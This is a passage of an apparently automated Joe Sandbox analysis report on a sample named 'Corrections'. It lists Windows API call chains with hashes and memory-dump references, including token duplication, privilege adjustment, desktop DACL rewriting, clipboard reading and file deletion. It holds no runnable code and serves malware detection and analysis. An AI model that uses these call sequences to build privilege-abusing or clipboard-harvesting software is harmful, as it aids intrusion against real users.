                                                                                                                                                                                                                                                                                            • Instruction ID: 3fe8d7f7ca59d5f6d5c05ca9a8e14523b95e8e73141003963251d445f9f51580
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78F0F87550020DFFDF05DF90C941E9E7B79FB04318F208445F9159A151C336EA21ABA1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00923963
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 92b124a1c455268a562d1933f0979e8232ad9060ed5ba54e329c3896b546d000
                                                                                                                                                                                                                                                                                            • Instruction ID: 176fc85927970bcd658a0d92f684238469218bcce287628e220d68aa47ec3fa8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92b124a1c455268a562d1933f0979e8232ad9060ed5ba54e329c3896b546d000
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF0A7B09143189FE752DF24DC45BD57FBCA701B0CF0000A5A24496181D7B44B88CF41
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00923A76
                                                                                                                                                                                                                                                                                              • Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 672797bd8ef73266b0d726915e80c7484bda182ded44910ed02805ca6c3bd9b0
                                                                                                                                                                                                                                                                                            • Instruction ID: f39c387a9e9d60163abf42d14dbdfc1bd7cb26b6c619121b4b123a2c3b7fd9e1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 672797bd8ef73266b0d726915e80c7484bda182ded44910ed02805ca6c3bd9b0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EE0C276A012245BCB20A358AC06FEA77EDDFC87A0F0441B1FC09D7258E960ED809690
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00960A84,?,?,00000000,?,00960A84,00000000,0000000C), ref: 00960737
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                            • Opcode ID: df8206d27078d499816dda11a77fdd72533e087786e804d7700777c6e0ae0806
                                                                                                                                                                                                                                                                                            • Instruction ID: 53285818c5cbaeaafee899bc7b202f13b7bf105e761ab67904de99c8fe64d45e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df8206d27078d499816dda11a77fdd72533e087786e804d7700777c6e0ae0806
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05D06C3201410DBBDF028F84DD06EDA3BAAFB48714F014100FE1866020C732E821AB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,0098D840), ref: 0098EAB1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8220331e3b29279941b1d62ff5f2c0cd690a2a1b19224c95e9827b56417607ea
                                                                                                                                                                                                                                                                                            • Instruction ID: ac50cff6d9c38813db5245b30373f7c42753fb55dfed3138e4ad3c562e831d3d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8220331e3b29279941b1d62ff5f2c0cd690a2a1b19224c95e9827b56417607ea
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AB0922801560005AD2C6A385A29999330C7842BB57DC1BC0E479852E1D339880FBA90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098DC54: FindFirstFileW.KERNEL32(?,?), ref: 0098DCCB
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0098DD1B
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0098DD2C
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098DC54: FindClose.KERNEL32(00000000), ref: 0098DD43
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0099666E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 53226b7f99107e373459ae0b34cb0002dd220ecfd6c889ed59a28666fbab9589
                                                                                                                                                                                                                                                                                            • Instruction ID: 42ee0b4f851f1b9b15a2cbeeba2a34f5b72a0c0c9116a0adc8d1d0ecb288e018
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53226b7f99107e373459ae0b34cb0002dd220ecfd6c889ed59a28666fbab9589
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1F08C362002109FCB10EF58E845B6EB7E9BF88320F048419F9499B352CB70BC01CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00982010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098205A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00982010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00982087
                                                                                                                                                                                                                                                                                              • Part of subcall function 00982010: GetLastError.KERNEL32 ref: 00982097
                                                                                                                                                                                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00981BD2
                                                                                                                                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00981BF4
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00981C05
                                                                                                                                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00981C1D
                                                                                                                                                                                                                                                                                            • GetProcessWindowStation.USER32 ref: 00981C36
                                                                                                                                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00981C40
                                                                                                                                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00981C5C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00981B48), ref: 00981A20
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A0B: CloseHandle.KERNEL32(?,?,00981B48), ref: 00981A35
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                            • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                            • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                            • Opcode ID: 1f3e6db6101a9680ba7dfdfe399db2a7e24a51b6560c30cdbf0ecbda71d1af48
                                                                                                                                                                                                                                                                                            • Instruction ID: fda931f57e41b1cf8dd02e93d1d0ecfde965cd8688d3f2519b60f5d5a77689b4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f3e6db6101a9680ba7dfdfe399db2a7e24a51b6560c30cdbf0ecbda71d1af48
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A819AB1904209AFDF11AFA4DD49FEE7BBCFF48314F144129F914A62A0E7318946DB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00981A60
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A6C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A82
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00981A99
                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00981518
                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0098154C
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00981563
                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0098159D
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009815B9
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 009815D0
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009815D8
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 009815DF
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00981600
                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00981607
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00981636
                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00981658
                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0098166A
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00981691
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00981698
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009816A1
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009816A8
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009816B1
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009816B8
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 009816C4
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009816CB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981ADF: GetProcessHeap.KERNEL32(00000008,009814FD,?,00000000,?,009814FD,?), ref: 00981AED
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,009814FD,?), ref: 00981AF4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009814FD,?), ref: 00981B03
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ecdb36a99348aba206067589c42ee63d5fa9cbb12c5860cb849f78849bc2f754
                                                                                                                                                                                                                                                                                            • Instruction ID: 353a97874a2e17944969b4c3056b9954feb2a079276d265006ac111f87242da0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecdb36a99348aba206067589c42ee63d5fa9cbb12c5860cb849f78849bc2f754
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E715DB290520AABDF10EFA5DD44FAEBBBCBF04350F084615F955A7290E7319906CBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(009BDCD0), ref: 0099F586
                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0099F594
                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0099F5A0
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0099F5AC
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0099F5E4
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0099F5EE
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0099F619
                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0099F626
                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0099F62E
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0099F63F
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0099F67F
                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 0099F695
                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000F), ref: 0099F6A1
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0099F6B2
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0099F6D4
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0099F6F1
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0099F72F
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0099F750
                                                                                                                                                                                                                                                                                            • CountClipboardFormats.USER32 ref: 0099F771
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0099F7B6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 07f6b4dd2b3ae6ab62ea9638a0dace80d8f4baf9e4af2050396c2f02f4e25f14
                                                                                                                                                                                                                                                                                            • Instruction ID: 880d86a144dc94f5f5bbee75cbd51ac9b81506b6bd919c88503a135b38ac789f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07f6b4dd2b3ae6ab62ea9638a0dace80d8f4baf9e4af2050396c2f02f4e25f14
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D61D035209301AFD700EF28E994F6AB7A8EF84714F14456CF456C72A2EB31ED45DB62
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00997403
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00997457
                                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00997493
                                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009974BA
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 009974F7
                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00997524
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b3491a244d428431299a8d049fd5412fff21ee16958a53b746b32826e8820ff
                                                                                                                                                                                                                                                                                            • Instruction ID: cdf417b357ba3ff3ae055116942689362afed882aa1bcc844a6dcedd034283c9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b3491a244d428431299a8d049fd5412fff21ee16958a53b746b32826e8820ff
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01D171B2508354AFC710EBA4D885EAFB7ECAFC8704F44091DF585D6292EB74DA44CB62
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0099A0A8
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0099A0E6
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0099A100
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0099A118
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0099A123
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0099A13F
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0099A18F
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(009E7B94), ref: 0099A1AD
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0099A1B7
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0099A1C4
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0099A1D4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: a7b1a65e9480a62bef853606550105f7dc91d240091e256554cd6a14e8b721fd
